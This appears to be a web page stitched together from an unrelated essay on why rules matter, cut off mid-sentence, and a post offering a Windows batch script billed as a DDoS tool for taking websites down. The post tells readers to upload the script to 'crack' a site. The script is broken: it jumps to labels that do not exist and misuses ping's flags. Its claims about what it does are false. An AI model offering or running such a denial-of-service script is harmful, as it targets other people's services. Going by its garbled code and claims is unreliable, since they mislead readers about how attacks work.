
Why we need RULES?

Rules are established principles or guidelines that dictate how something should be done or how situations should be handled. They are used to regulate behavior, ensure fairness, and maintain order in various contexts, such as society, organizations, games, and social settings. Rules can be formal or informal. Formal rules are codified and enforced by a governing body, such as laws, regulations, or contracts. Informal rules are unwritten and enforced by social pressure, such as social norms or etiquette. Rules can be helpful in many ways. They can: Ensure fairness by creating a level playing field for everyone. Protect people from harm by setting standards of behavior. Maintain order by providing a framework for behavior. However, rules can also be seen as restrictive or unfair. It is important to consider the purpose of a rule before deciding whether or not to follow it. For example, a speed limit may be seen as restrictive, but it is also designed to protect people from harm. A dress

DDOS Attack .bat file

Image result for down a site

This is the code to use down websites , If You want to crack a site , log in to the site and upload the .bat file which these codes in!
make sure you put .bat when you save this file on notepad 
ex:- hack.bat

@echo off
mode 67,16
Title Ddos by Elite_x
color 05
echo ------------------------------------------------------
echo Ddos batch made by Elite_x
echo ------------------------------------------------------
set /p T=Target URL:
echo ------------------------------------------------------
ping %T%
echo ------------------------------------------------------
@ping.exe -n 5 -w 40000 > nul
goto next
set /P m=IP host:
set /p n=Packet size:
color 0c
echo sending Packet to server %m%
ping %m% -i %n% -t >nul
goto DDOS

by:- G.Nadunmith and C.Lakshan
